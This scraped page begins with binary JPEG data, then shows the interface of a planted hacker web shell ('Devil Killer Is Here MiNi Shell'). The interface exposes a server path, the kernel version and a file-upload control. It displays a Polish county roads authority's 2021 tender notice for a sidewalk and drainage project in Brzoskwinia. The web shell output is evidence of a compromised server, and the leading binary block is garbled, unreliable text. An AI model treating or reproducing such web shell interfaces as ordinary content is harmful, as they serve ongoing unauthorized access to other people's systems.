JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210708/0010830301-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00108303 z dnia 2021-07-08</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi powiatowej nr 2122K w Brzoskwini w zakresie budowy chodnika od sklepu Lewiatan do przystanku Brzoskwinia Góra. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD DRÓG POWIATU KRAKOWSKIEGO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351579270</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Karola Wojtyły 106</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Batowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-086</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 622 10 10</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">12 622 10 12</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@zdpk.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdpk.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Drogownictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi powiatowej nr 2122K w Brzoskwini w zakresie budowy chodnika od sklepu Lewiatan do przystanku Brzoskwinia Góra. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2780c8fb-def4-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00108303</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00007156/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.14 Przebudowa drogi powiatowej nr 2122K w Brzoskwini w zakresie budowy chodnika od sklepu Lewiatan do przystanku Brzoskwinia Góra</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> ttps://bip.malopolska.pl/zdpkrakowskiego/Article/id,58268.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: www.zp@zdpk.krakow.pl. Przesyłane dokumenty muszą być opatrzone przez<br/>osobę lub osoby uprawnione do reprezentowania Wykonawcy kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informujemy, że:<br/>• administratorem Państwa danych osobowych jest: Zarząd Dróg Powiatu Krakowskiego; ul. Karola Wojtyły 106, 32-086 Batowice;<br/>•Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: „Przebudowa drogi powiatowej nr 2122K w Brzoskwini w zakresie budowy chodnika od sklepu Lewiatan do przystanku Brzoskwinia Góra”, prowadzonym w trybie podstawowym bez negocjacji, na podstawie art. 275 ust 1 ustawy z dnia 11 września 2019 r. –Prawo zamówień<br/>publicznych (Dz. U. z 2019 r., poz. 2019 z późn. zm.), dalej „ustawa PZP”;<br/>•odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty,<br/>którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawyPZP;<br/>• Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy PZP, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>•obowiązek podania przez Państwa danych osobowych bezpośrednio Państwa dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;konsekwencje niepodania określonych danych wynikają z ustawy<br/>PZP;<br/>• w odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22RODO;<br/>• posiadają Państwo:− na podstawie art. 15 RODO prawo dostępu do danych osobowych Państwa dotyczących;− na podstawie art. 16 RODO prawo do<br/>sprostowania Państwa danych osobowych; o ile ich zmiana nie skutkuje zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności protokołu oraz jego załączników;− na podstawie art. 18<br/>RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, oraz art. 19 ust. 3 ustawy PZP;<br/>−prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwa, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO; <br/>• nie przysługuje Państwu:− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Jednocześnie Zamawiający przypomina o ciążącym na<br/>Wykonawcy obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych,których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO. W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia<br/>2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub<br/>konkursu. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z ustawą.Wystąpienie z żądaniem, o którym<br/>mowa w art. 18 ust. 1 rozporządzenia 2016/679,nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu. W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień Publicznych,prawa,<br/>o których mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/261/30/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: „Przebudowa drogi powiatowej nr 2122K w Brzoskwini w zakresie budowy chodnika od sklepu Lewiatan do przystanku Brzoskwinia Góra”.<br/>Zakres robót obejmuje przebudowę drogi powiatowej nr 2122K na odcinku ok. 550 m (od sklepu Lewiatan do przystanku Brzoskwinia Koziary) w miejscowości Brzoskwinia w zakresie: <br/>– poszerzenia jezdni przy prawej krawędzi;<br/>– poszerzenia jezdni przy lewej krawędzi;<br/>– wykonania chodnika 2m przy prawej krawędzi jezdni;<br/>– przebudowy poboczy przy lewej krawędzi jezdni;<br/>– wykonania peronu przystankowego przy lewej krawędzi jezdni;<br/>– przebudowy odwodnienia drogi w formie rowu przydrożnego po lewej stronie jezdni;<br/>– budowy zjazdów indywidualnych;<br/>– wykonania odwodnienia pasa drogowego po za chodnikiem w formie korytek betonowych i odwodnień liniowych;<br/>– wykonania odwodnienia pasa drogowego w formie ciągów drenarskich wraz z<br/>wylotem;<br/>– wykonania odwodnienia jezdni w formie kanalizacji deszczowej zlokalizowanej pod chodnikiem wraz z wylotem i umocnieniem dna oraz skarp odbiornika;<br/>– ubezpieczenia skarp płytami ażurowymi;<br/>– elementu oporujące nasyp konstrukcji chodnika dla pieszych w formie palisady<br/>betonowej oraz obrzeża oporującego typ „L”;<br/>– rozbudowy przepustu Ø800mm pod zjazdem na drogę powiatową wraz z przyczółkiem i ubezpieczeniem dna na wlocie w km 0+009,00 opracowania<br/>– ubezpieczenia wylotu z kanalizacji deszczowej w formie płyt ażurowych zamkniętych palisadą drewnianą;<br/>– utwardzenia terenu na dojściu z istniejącego chodnika do projektowanego;<br/>– rozbiórki istniejących przepustów pod zjazdami indywidualnymi;<br/>– przebudowy i budowę zjazdów z drogi powiatowej – zabezpieczenie istniejących sieci uzbrojenia terenu pod projektowanymi obiektami; – usunięcia zieleni kolidującej; – niwelacji terenu.<br/>2.	Szczegółowy zakres robót i sposób ich wykonania został określony w załączonej dokumentacji projektowej jak również w Specyfikacji Technicznej Wykonania i Odbioru Robót (ST). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34928500-3 - Oświetleniowy sprzęt uliczny</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45231220-3 - Roboty budowlane w zakresie gazociągów</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45255600-5 - Roboty w zakresie kładzenia rur w kanalizacji</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. O udzielenie zamówienia ubiegać się mogą wykonawcy, którzy złożą ważną ofertę.<br/>2. Zamawiający dokona wyboru najkorzystniejszej oferty spośród ważnych ofert.<br/>3. Przy wyborze najkorzystniejszej oferty spośród ofert nie odrzuconych, Zamawiający kierował się będzie następującymi kryteriami i ich wagą:<br/>- cena ofertowa brutto: 60%<br/>- okres udzielonej gwarancji i rękojmi:40%<br/>4. Obliczanie punktacji oferty wg wzoru: Pof = PC + PG 5. Obliczanie punktacji dla<br/>kryterium cenowego wg wzoru: Pc = Cmin / Cb.of x Kp x Wc gdzie : Pc - ilość punktów przyznanych<br/>ofercie ocenianej Cmin - najniższa cena ofertowa Cb.of - cena badanej oferty Kp - współczynnik<br/>proporcjonalności = 100 Wc - waga procentowa dla kryterium = 60%6. Obliczanie punktacji dla<br/>kryterium gwarancji i rękojmi wg wzoru: PG = Gb.of / 60 x Kp x Wc gdzie : PG - ilość punktów<br/>przyznanych ofercie ocenianej60 - najdłuższy okres w miesiącach dopuszczony przez Zamawiającego<br/>Gb.of - okres w miesiącach udzielonej gwarancji i rękojmi w badanej ofercie Kp -współczynnik<br/>proporcjonalności = 100Wc - waga procentowa dla kryterium = 40%Zamawiający wymaga aby<br/>Wykonawca udzielił minimum 36 miesięcy gwarancji i rękojmi na wykonany przedmiot umowy.<br/>Maksymalny okres gwarancji i rękojmi dopuszczony przez Zamawiającego wynosi 60miesięcy.Uwaga<br/>1: zaproponowany minimalny okres gwarancji i rękojmi wynosi co najmniej 36 m-cy.W przypadku<br/>zaproponowania krótszego okresu oferta Wykonawcy zostanie odrzucona jako niezgodna odrzucona<br/>jako niezgodna z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 Pzp.Uwaga 2:W przypadku<br/>zaproponowania okresu gwarancji i rękojmi dłuższego niż 60 m-cy punkty zostaną przyznane jak za<br/>okres 60 m-cy, a do umowy zostanie wpisany okres 60 m-cy.7. Najkorzystniejszą ofertę Zamawiający<br/>uzna tę, która otrzyma najwyższą liczbę punktów wg kryteriów oceny ofert.8. Jeżeli nie można wybrać<br/>oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i<br/>innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z niższą ceną.9.<br/>Zamawiający udzieli zamówienia wykonawcy, którego oferta będzie najkorzystniejsza.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	Posiadania zdolności do występowania w obrocie gospodarczym. <br/>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań.<br/>2)	Posiadania kompetencji lub uprawnień do wykonania określonej działalności zawodowej jeżeli przepisy prawa nakładają obowiązek ich posiadania.<br/>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań.<br/>3)	Zdolności technicznej i zawodowej.<br/>Wykonawca spełni ten warunek jeżeli wykaże że:<br/> a) W okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie zrealizował co najmniej jedno zamówienie o wartości nie mniejszej niż 500 000,00 zł brutto polegające na budowie, rozbudowie lub przebudowie drogi obejmujące wykonanie chodnika, wykonanie kanalizacji opadowej lub sanitarnej. Zamawiający dopuszcza wskazanie wykonania osobnych zamówień dotyczących wykonania chodnika oraz wykonania kanalizacji opadowej lub sanitarnej o łącznej wartości 500 000,00 zł brutto.<br/>Na potwierdzenie spełniania tego warunku Wykonawca złoży „Wykaz robót”- załącznik nr 4 SWZ wraz z załączeniem dokumentu potwierdzającego, że roboty zostały wykonane w sposób należyty zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.<br/>b) Dysponuje kierownikiem budowy/kierownikiem robot drogowych, który będzie uczestniczyć w wykonywaniu zamówienia i posiada wymagane prawem uprawnienia do kierowania robotami drogowymi.<br/>Na potwierdzenie spełniania tego warunku Wykonawca złoży wykaz osób załącznik nr 3 do SWZ<br/> 4) Sytuacji ekonomicznej i finansowej.<br/>Wykonawca spełni ten warunek jeżeli wykaże, że posiada opłacone ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości co najmniej 100 000,00 PLN. <br/>Na potwierdzenie spełniania tego warunku Wykonawca złoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, wystawiony nie wcześniej niż 3 miesiące<br/>przed jego złożeniem.<br/>2) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawione nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub<br/>opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania wniosków o dopuszczenie do<br/>udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności<br/>należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w<br/>sprawie spłat tych należności;<br/>3) zaświadczenie albo inny dokument właściwej terenowej jednostki<br/>organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej<br/>placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca<br/>nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1<br/>pkt1 ustawy, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania<br/>z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed<br/>upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem<br/>terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne<br/>lub zdrowotne wraz odsetkami lub grzywnami lub 